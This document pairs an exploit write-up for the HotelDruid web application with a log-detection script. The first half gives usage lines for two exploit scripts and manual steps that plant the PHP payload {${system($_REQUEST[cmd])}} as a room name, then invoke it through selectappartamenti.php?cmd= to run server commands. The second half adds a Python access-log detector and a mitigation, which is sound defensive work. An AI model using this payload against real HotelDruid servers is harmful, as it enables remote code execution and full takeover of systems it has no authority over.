- HotelDruidExploit.py
This exploit creates a new room with our PHP payload as the room name.
Usage:
$ ./HotelDruidExploit.py -h
$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid
- HotelDruidExploitRoom.py
This exploit works if you already know the room name.
Usage:
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"
1). Navigate to the HotelDruid page.
2). Click on Tables -> Rooms.
3). In the Create New Room field, add the PHP code below and click Add.
{${system($_REQUEST[cmd])}}
4). You will see a new room with our payload in the "Room" name field.
5). Go to the link below and you will get command execution; later you can get a full shell.
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
Note: Replace the IP with your HotelDruid target IP.
This vulnerability occurs because room names are stored inside /var/www/html/hoteldruid/dati/selectappartamenti.php, and selectappartamenti.php is a PHP file, so any PHP code inside that file is executed by the server.
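
A detection check that follows from this root cause, as an added example that is not part of the original exploit scripts: it flags web access-log entries that request the room-name file directly, and rates requests carrying parameters or a POST body higher. It assumes the file is normally only included by the application and never requested by a browser, and that logs use the Apache/nginx combined format; the function name find_direct_hits and the sample lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path suffix taken from the page; the log format and samples are assumptions.
TARGET = "/dati/selectappartamenti.php"

# Apache/nginx "combined" access-log prefix (assumed format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_direct_hits(lines):
    """Return one dict per request that addresses the room-name file directly."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["uri"])
        # Decode %xx and collapse duplicate slashes before comparing paths.
        path = re.sub(r"/+", "/", unquote(parts.path))
        if not path.endswith(TARGET):
            continue
        params = sorted(parse_qs(parts.query, keep_blank_values=True))
        # Request parameters or a POST body on a data file outrank a bare hit.
        high = bool(params) or m["method"] == "POST"
        hits.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": int(m["status"]), "params": params,
            "severity": "high" if high else "medium",
        })
    return hits

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /hoteldruid/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /hoteldruid/dati/selectappartamenti.php?cmd=whoami HTTP/1.1" 200 312 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:40 +0000] "POST /hoteldruid//dati/selectappartamenti.php HTTP/1.1" 200 298 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:11:15:03 +0000] "GET /hoteldruid/dati/selectappartamenti.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_direct_hits(SAMPLE):
        print(hit)
```

A 200 response on any flagged line means the web server served the data file as PHP; denying direct HTTP access to the dati/ directory removes that path regardless of what the file contains.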